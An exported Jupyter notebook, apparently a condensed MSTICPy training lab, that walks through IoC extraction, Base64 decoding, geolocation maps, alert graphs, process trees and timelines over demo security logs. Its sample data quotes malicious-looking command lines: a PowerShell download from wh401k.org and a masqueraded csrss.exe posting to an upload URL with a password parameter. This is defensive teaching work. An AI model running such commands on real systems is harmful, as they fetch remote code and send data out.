ioc_extractor = IoCExtract()
ioc_df = ioc_extractor.extract(data=merged_filtered, columns=['decoded_string'])
ioc_df
Out[108]:
IoCType Observable SourceIndex Input
0 dns microsoft.com 21 ping microsoft.com -n 15
1 dns wh401k.org 968 -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequest -Uri http:...
2 url http://wh401k.org/getps 968 -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequest -Uri http:...

We can also use domain_utils to get some other information on the domain, such as what IP addresses it resolves to.

In [109]:
from msticpy.sectools.domain_utils import dns_resolve
dns_info = dns_resolve(ioc_df.iloc[0]['Observable'])
display(dns_info)
{'qname': 'microsoft.com.',
 'rdtype': 'A',
 'rdclass': 'IN',
 'response': 'id 38992\nopcode QUERY\nrcode NOERROR\nflags QR RD RA\n;QUESTION\nmicrosoft.com. IN A\n;ANSWER\nmicrosoft.com. 931 IN A 104.215.148.63\nmicrosoft.com. 931 IN A 40.76.4.15\nmicrosoft.com. 931 IN A 40.112.72.205\nmicrosoft.com. 931 IN A 40.113.200.201\nmicrosoft.com. 931 IN A 13.77.161.179\n;AUTHORITY\n;ADDITIONAL',
 'nameserver': '194.168.4.100',
 'port': 53,
 'canonical_name': 'microsoft.com.',
 'rrset': ['104.215.148.63',
  '40.76.4.15',
  '40.112.72.205',
  '40.113.200.201',
  '13.77.161.179'],
 'expiration': datetime.datetime(2022, 2, 9, 23, 14, 5, 373327)}

Lab Exercise 4

Syslog data is a common data source during security analysis. The syslog data structure includes a lot of key information in a single field that can make extraction complicated.
In this exercise you will load syslog data and extract indicators from the Message field.

Bonus Task:
Identify the Base64 encoded syslog messages and extract indicators from those as well.

Hint:
  • Syslog data is found under the LinuxSyslog type of queries
  • Core syslog data is stored in the SyslogMessage column
In [134]:
# Load syslog data
sysdf = qry_prov.LinuxSyslog.list_all_syslog_events()
sysdf.head()
Out[134]:
TenantId SourceSystem TimeGenerated Computer EventTime [UTC] Facility HostName SeverityLevel SyslogMessage ProcessID HostIP ProcessName MG Type _ResourceId Source AccountName
0 8ecf8077-cf51-4820-aadd-14040956f35d Linux 5/4/2021, 7:48:01.990 AM SOC-FW-CEF 5/4/2021, 7:48:01.000 AM authpriv SOC-FW-CEF info pam_unix(cron:session): session opened for user root by (uid=0) 11466.0 10.0.1.7 CRON 00000000-0000-0000-0000-000000000002 Syslog /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros... user user
1 8ecf8077-cf51-4820-aadd-14040956f35d Linux 5/4/2021, 7:48:01.993 AM SOC-FW-CEF 5/4/2021, 7:48:01.000 AM authpriv SOC-FW-CEF info pam_unix(cron:session): session closed for user root 11466.0 10.0.1.7 CRON 00000000-0000-0000-0000-000000000002 Syslog /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros... user user
2 8ecf8077-cf51-4820-aadd-14040956f35d Linux 5/4/2021, 7:49:01.990 AM SOC-FW-RSYSLOG 5/4/2021, 7:49:01.000 AM authpriv SOC-FW-RSYSLOG info pam_unix(cron:session): session opened for user root by (uid=0) 111364.0 10.0.1.5 CRON 00000000-0000-0000-0000-000000000002 Syslog /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros... user user
3 8ecf8077-cf51-4820-aadd-14040956f35d Linux 5/4/2021, 7:49:01.990 AM SOC-FW-RSYSLOG 5/4/2021, 7:49:01.000 AM syslog SOC-FW-RSYSLOG info action 'action 2' resumed (module 'builtin:omfile') [v8.32.0 try http://www.rsyslog.com/e/2359 ] NaN 10.0.1.5 rsyslogd 00000000-0000-0000-0000-000000000002 Syslog /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros... user user
4 8ecf8077-cf51-4820-aadd-14040956f35d Linux 5/4/2021, 7:49:01.990 AM SOC-FW-RSYSLOG 5/4/2021, 7:49:01.000 AM syslog SOC-FW-RSYSLOG warn action 'action 2' suspended (module 'builtin:omfile'), retry 0. There should be messages before ... NaN 10.0.1.5 rsyslogd 00000000-0000-0000-0000-000000000002 Syslog /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros... user user
In [135]:
# Extract URL indicators from the SyslogMessage column and get a unique list of indicators found
#query[ query['SyslogMessage'].str.contains("www") ]['SyslogMessage']

ioc_extractor = IoCExtract()
ioc_df = ioc_extractor.extract(data=query, columns=['SyslogMessage'], ioc_types=['url'])
ioc_df['Observable'].unique()
Out[135]:
array(['http://www.rsyslog.com/e/2359', 'www.rsyslog.com',
       'http://www.rsyslog.com/e/2007', 'http://www.rsyslog.com/e/2106',
       'http://www.microsoft.com', 'www.microsoft.com'], dtype=object)
In [136]:
# Decode Base64 data and extract indicators
sys_b64_df = base64.unpack_df(data=sysdf, column='SyslogMessage')

# get a list of decoded strings
sys_b64_df['decoded_string'].unique()

# Extract dns indicators from these strings (use the full_decoded_string column)
ioc_df = ioc_extractor.extract(data=sys_b64_df, columns=['full_decoded_string'], ioc_types=['dns'])
ioc_df
Out[136]:
IoCType Observable SourceIndex Input
0 dns www.github.com 9 <decoded type='string' name='[None]' index='1' depth='1'>The secret URI is www.github.com/micros...

04: Data Visualization¶

Data visualization is a key tool in any data analyis scenario and the same is true during security analysis. MSTICPy contains a number of visualizations, below we will plot locations on a map to help identify anomolous logon locations, showing a graph of security alerts, and plotting a process tree showing process executions on a host.

MSTICpy uses Bokeh and Folium to power its visualization features.

The first thing we need to do is get some data to plot. Here we will use Azure AD signin events. These events include the location the login occured from allowing us to easily plot them on a map for geospacial analysis.

In [137]:
# Plot IP geolocation on a map
loc_data = qry_prov.Azure.list_all_signins_geo()
loc_data.head()
Out[137]:
TenantId SourceSystem TimeGenerated ResourceId OperationName OperationVersion Category ResultType ResultSignature ResultDescription DurationMs CorrelationId Resource ResourceGroup ResourceProvider Identity Level Location AlternateSignInName AppDisplayName AppId AuthenticationDetails AuthenticationMethodsUsed AuthenticationProcessingDetails AuthenticationRequirement ... NetworkLocationDetails OriginalRequestId ProcessingTimeInMilliseconds RiskDetail RiskEventTypes RiskEventTypes_V2 RiskLevelAggregated RiskLevelDuringSignIn RiskState ResourceDisplayName ResourceIdentity ServicePrincipalId ServicePrincipalName Status TokenIssuerName TokenIssuerType UserAgent UserDisplayName UserId UserPrincipalName AADTenantId Type Result Latitude Longitude
0 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 19:04.4 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 c4b4ea3c-58ff-4e0e-b5b0-d2ea01cce380 Microsoft.aadiam Microsoft.aadiam NaN CTFUser3 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] singleFactorAuthentication ... [] f05079ed-f820-4531-ab26-498b53af3800 366 none [] [] none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... CTFUser3 acc49186-e946-4f6c-85af-669807da0e0f ctfuser3@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 42.997181 -86.848312
1 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 32:44.8 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 d5ef0f81-318f-4881-8df1-8415aab77d1a Microsoft.aadiam Microsoft.aadiam NaN Zack Von 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] NaN ... [] 121dca00-0930-40fe-9b69-bbc1e33c3500 394 none [] NaN none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... Zack Von 2566a1a6-4d03-40d2-8836-6c8cf1ce517f zvon@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 48.614380 -121.110313
2 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 32:44.8 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 d5ef0f81-318f-4881-8df1-8415aab77d1a Microsoft.aadiam Microsoft.aadiam NaN Zack Von 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] singleFactorAuthentication ... [] 121dca00-0930-40fe-9b69-bbc1e33c3500 394 none [] [] none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... Zack Von 2566a1a6-4d03-40d2-8836-6c8cf1ce517f zvon@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 48.614380 -121.110313
3 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 19:04.4 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 c4b4ea3c-58ff-4e0e-b5b0-d2ea01cce380 Microsoft.aadiam Microsoft.aadiam NaN CTFUser3 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] NaN ... [] f05079ed-f820-4531-ab26-498b53af3800 366 none [] NaN none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... CTFUser3 acc49186-e946-4f6c-85af-669807da0e0f ctfuser3@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 42.997181 -86.848312
4 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 05:35.8 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 bf124019-b325-4a4a-81ff-6c2823461620 Microsoft.aadiam Microsoft.aadiam NaN CTFUser3 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [\r\n {\r\n "key": "Login Hint Present",\r\n "value": "True"\r\n }\r\n] singleFactorAuthentication ... [] 39f36cc7-ad3e-430c-bf78-bc96fbc33300 553 none [] [] none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safa... CTFUser3 acc49186-e946-4f6c-85af-669807da0e0f ctfuser3@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 41.465630 -73.610718

5 rows × 62 columns

In [138]:
ip_ents = []
def format_ips(row):
    ip_ent = entities.ip_address.Ip(Address=row['IPAddress'])
    loc = entities.GeoLocation(Longitude=float(row['Longitude']), Latitude=float(row['Latitude']))
    ip_ent.Location = loc
    ip_ents.append(ip_ent)
    
# Format dataset into entities
loc_data.apply(format_ips, axis=1)
# Create Map plot
folium_map = FoliumMap(zoom_start=2)
# Add IP entities to the map
folium_map.add_ip_cluster(ip_entities=ip_ents, color="blue")
# Center the map around the plotted entities
folium_map.center_map()
# Display the map
folium_map
Out[138]:
Make this Notebook Trusted to load map: File -> Trust Notebook

Another useful visualization is a graph plot that shows connections between events. This is particularily useful when looking at data item such as alerts that contain a lot of embedded data such as affected hosts and users. By graph plotting alert data we can see the connections between them that might help a security analyst get a better understanding of an intrusion.

Using create_alert_graph we can create a NetworkX representation of a security alert, and link it to our other alerts. We then call draw_alert_entity_graph to display this.

In [139]:
# Security Alert Graph
alert_df = qry_prov.SecurityAlert.list_alerts()
# Create a Security Alert entity
alert = SecurityAlert(alert_df.iloc[0])
# Create a graph
grph = create_alert_graph(alert)
# Add other alerts to the graph
full_grph = add_related_alerts(alert_df, grph)
# Display the graph
nbdisplay.draw_alert_entity_graph(full_grph, width=15)
Loading BokehJS ...
Out[139]:
Figure(
id = '1003', …)
above = [],
align = 'start',
aspect_ratio = None,
aspect_scale = 1,
background = None,
background_fill_alpha = 1.0,
background_fill_color = '#ffffff',
below = [LinearAxis(id='1014', ...)],
border_fill_alpha = 1.0,
border_fill_color = '#ffffff',
center = [Grid(id='1017', ...), Grid(id='1021', ...), Label(id='1053', ...), Label(id='1054', ...), Label(id='1055', ...), Label(id='1056', ...), Label(id='1057', ...), Label(id='1058', ...), Label(id='1059', ...), Label(id='1060', ...), Label(id='1061', ...), Label(id='1062', ...), Label(id='1063', ...)],
css_classes = [],
disabled = False,
extra_x_ranges = {},
extra_x_scales = {},
extra_y_ranges = {},
extra_y_scales = {},
frame_height = None,
frame_width = None,
height = 800,
height_policy = 'auto',
hidpi = True,
inner_height = 0,
inner_width = 0,
js_event_callbacks = {},
js_property_callbacks = {},
left = [LinearAxis(id='1018', ...)],
lod_factor = 10,
lod_interval = 300,
lod_threshold = 2000,
lod_timeout = 500,
margin = (0, 0, 0, 0),
match_aspect = False,
max_height = None,
max_width = None,
min_border = 5,
min_border_bottom = None,
min_border_left = None,
min_border_right = None,
min_border_top = None,
min_height = None,
min_width = None,
name = None,
outer_height = 0,
outer_width = 0,
outline_line_alpha = 1.0,
outline_line_cap = 'butt',
outline_line_color = '#e5e5e5',
outline_line_dash = [],
outline_line_dash_offset = 0,
outline_line_join = 'bevel',
outline_line_width = 1,
output_backend = 'canvas',
renderers = [GraphRenderer(id='1038', ...)],
reset_policy = 'standard',
right = [],
sizing_mode = None,
subscribed_events = [],
syncable = True,
tags = [],
title = Title(id='1004', ...),
title_location = 'above',
toolbar = Toolbar(id='1029', ...),
toolbar_location = 'right',
toolbar_sticky = True,
visible = True,
width = 1500,
width_policy = 'auto',
x_range = Range1d(id='1006', ...),
x_scale = LinearScale(id='1010', ...),
y_range = Range1d(id='1008', ...),
y_scale = LinearScale(id='1012', ...))

Another common visualization in security tooling is the process tree. This show the hierarchical relationship of processes executed on a host.

MSTICPy bas functions to both build and plot these process trees based off Windows process creation events. More details on these functions can be found here.

In [140]:
# Before plotting a process tree we need to get data related to process creation events
proc_df = qry_prov.WindowsSecurity.get_process_tree()
proc_df.head()
Out[140]:
TenantId Account EventID TimeGenerated Computer SubjectUserSid SubjectUserName SubjectDomainName SubjectLogonId NewProcessId NewProcessName TokenElevationType ProcessId CommandLine ParentProcessName TargetLogonId SourceComputerId TimeCreatedUtc NodeRole Level ProcessId1 NewProcessId1
0 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4688 2019-02-14 11:51:38.507 MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 MSTICAdmin MSTICAlertsWin1 0x78225e 0x1150 C:\W!ndows\System32\regsvr32.exe %%1936 0x12f4 .\regsvr32 /u /s c:\windows\fonts\csrss.exe "http://www.401k.com/upload?pass=34592389" post C:\Windows\System32\cmd.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-14 11:51:38.507 source 0
1 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4688 2019-02-14 11:51:37.697 MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 MSTICAdmin MSTICAlertsWin1 0x78225e 0x6dc C:\Windows\System32\conhost.exe %%1936 0x12f4 \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 C:\Windows\System32\cmd.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-14 11:51:37.697 sibling 1
2 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4688 2019-02-14 11:51:38.117 MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 MSTICAdmin MSTICAlertsWin1 0x78225e 0x114c C:\Windows\System32\cmd.exe %%1936 0x12f4 cmd /c echo Begin Security Demo tasks C:\Windows\System32\cmd.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-14 11:51:38.117 sibling 1
3 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4688 2019-02-14 11:51:38.137 MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 MSTICAdmin MSTICAlertsWin1 0x78225e 0xfa4 C:\Windows\System32\cmd.exe %%1936 0x12f4 cmd /c echo Any questions about the commands executed here then please contact one of C:\Windows\System32\cmd.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-14 11:51:38.137 sibling 1
4 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4688 2019-02-14 11:51:38.153 MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 MSTICAdmin MSTICAlertsWin1 0x78225e 0x1164 C:\Windows\System32\cmd.exe %%1936 0x12f4 cmd /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com C:\Windows\System32\cmd.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-14 11:51:38.153 sibling 1
In [184]:
## Modified for latest compatibility

# We start by building the process tree

from msticpy.sectools.proc_tree_builder import build_process_tree

p_tree_win = build_process_tree(proc_df, schema=None, debug=False)
# We then get then identify the root processes and their descendents
proc_tree = ptree.get_descendents(p_tree_win, ptree.get_roots(p_tree_win).iloc[0])
# we can then plot the process tree
nbdisplay.plot_process_tree(data=proc_tree, legend_col="SubjectUserName", show_table=True)
Loading BokehJS ...
Out[184]:
(Figure(id='4731', ...), Column(id='4866', ...))

Temporal analysis is another key tool in security investigation. Seeing in which order events occur, and how events cluster temporally can provide some invaluable insights. To help with this MSTICPy contains a flexible timeline feature that allows for the plotting of a range of data on a timeline. You can plot simple single catagory descrite events, running values, and multi series events all in an interactive Bokeh visualization.

Using the timeline is a simple as passing a dataframe of data to display_timeline. By default this will use the TimeGenerated column for the time element, and a set of common column values to display when hovering over an event. These can be customized with the time_column and source_columns parameters (as used below).

In [185]:
# Get some data to plot
alert_df = qry_prov.SecurityAlert.list_alerts()
# Plot these values on a timeline based on when they were generated
nbdisplay.display_timeline(alert_df, source_columns=["AlertName"])
Loading BokehJS ...
Out[185]:
Column(
id = '5162', …)
align = 'start',
aspect_ratio = None,
background = None,
children = [Figure(id='5092', ...), Figure(id='5124', ...)],
css_classes = [],
disabled = False,
height = None,
height_policy = 'auto',
js_event_callbacks = {},
js_property_callbacks = {},
margin = (0, 0, 0, 0),
max_height = None,
max_width = None,
min_height = None,
min_width = None,
name = None,
rows = 'auto',
sizing_mode = None,
spacing = 0,
subscribed_events = [],
syncable = True,
tags = [],
visible = True,
width = None,
width_policy = 'auto')

Its also possible to group events by a column to show them as seperate rows in the timeline. This is done by passing the column you want to split on as group_by - below we are grouping by the alert severity.

There are also many other ways to customize this timeline. Please read the full documentation to see a list of options.

In [153]:
nbdisplay.display_timeline(alert_df, source_columns=["AlertName"], group_by="Severity")
Loading BokehJS ...
Out[153]:
Column(
id = '2348', …)
align = 'start',
aspect_ratio = None,
background = None,
children = [Figure(id='2237', ...), Figure(id='2269', ...)],
css_classes = [],
disabled = False,
height = None,
height_policy = 'auto',
js_event_callbacks = {},
js_property_callbacks = {},
margin = (0, 0, 0, 0),
max_height = None,
max_width = None,
min_height = None,
min_width = None,
name = None,
rows = 'auto',
sizing_mode = None,
spacing = 0,
subscribed_events = [],
syncable = True,
tags = [],
visible = True,
width = None,
width_policy = 'auto')

Lab Exercise 5

In this lab you are going to plot your own timeline of events.
The timeline show plot Windows Host Logon events (.WindowsSecurity.list_host_logons).
You should group these by the logon type, and the hover over should show the user account logging in and what IP address they logged in from.
Hint:
  • Grouping is passed with the 'group_by` parameter.
  • Hover over values are set with the 'source_columns' parameter.
In [157]:
# Load data
tl_df = qry_prov.WindowsSecurity.list_host_logons()

# Create timeline lab
nbdisplay.display_timeline(tl_df, source_columns=["SubjectUserName", "IpAddress"], group_by="LogonType")
Loading BokehJS ...
Out[157]:
Column(
id = '3614', …)
align = 'start',
aspect_ratio = None,
background = None,
children = [Figure(id='3477', ...), Figure(id='3509', ...)],
css_classes = [],
disabled = False,
height = None,
height_policy = 'auto',
js_event_callbacks = {},
js_property_callbacks = {},
margin = (0, 0, 0, 0),
max_height = None,
max_width = None,
min_height = None,
min_width = None,
name = None,
rows = 'auto',
sizing_mode = None,
spacing = 0,
subscribed_events = [],
syncable = True,
tags = [],
visible = True,
width = None,
width_policy = 'auto')

05: Machine Learning using MSTICPy¶

MSTICPy has a number of basic ML features to support simple analysis that is common in security investigaiton. In the following section we will look at two of those; timeseries analysis and clustering.

In order to effectively hunt in a dataset analysts need to focus on specific events of interest. Below we use MSTICpy's time series analysis machine learning capabilities to identify anomalies in our network traffic for further investigation.
As well as computing anomalies we visualize the data so that we can more easily see where these anomalies present themselves.

In [166]:
# Import MSTICPy's timeseries specfic features
from msticpy.analysis.timeseries import timeseries_anomalies_stl
from msticpy.nbtools.timeseries import display_timeseries_anomolies

# Load some network data to apply our analysis to
stldemo = qry_prov.Network.get_network_summary()

# Conduct our timeseries analyis
output = timeseries_anomalies_stl(stldemo)
# Visualize the timeseries and any anomalies
display_timeseries_anomolies(data=output, y= 'TotalBytesSent')
Loading BokehJS ...
Out[166]:
Column(
id = '4295', …)
align = 'start',
aspect_ratio = None,
background = None,
children = [Figure(id='3902', ...), Figure(id='4023', ...)],
css_classes = [],
disabled = False,
height = None,
height_policy = 'auto',
js_event_callbacks = {},
js_property_callbacks = {},
margin = (0, 0, 0, 0),
max_height = None,
max_width = None,
min_height = None,
min_width = None,
name = None,
rows = 'auto',
sizing_mode = None,
spacing = 0,
subscribed_events = [],
syncable = True,
tags = [],
visible = True,
width = None,
width_policy = 'auto')

Want to learn More?¶

Explore the MSTIC documentation and the full tutorial at the following resources.

Useful resources:

  • https://github.com/microsoft/msticpy-lab
  • https://github.com/Azure-Samples/azure-python-labs/blob/main/9-MSTICPy/README.md
  • https://msticpy.readthedocs.io/en/latest/index.html#

Credit to the MSTIC team who developed the original lab that this worksheet is based upon. This is a condensed overview of capabilities of the MSTICPy toolkit developed for educational purposes only.

In [ ]: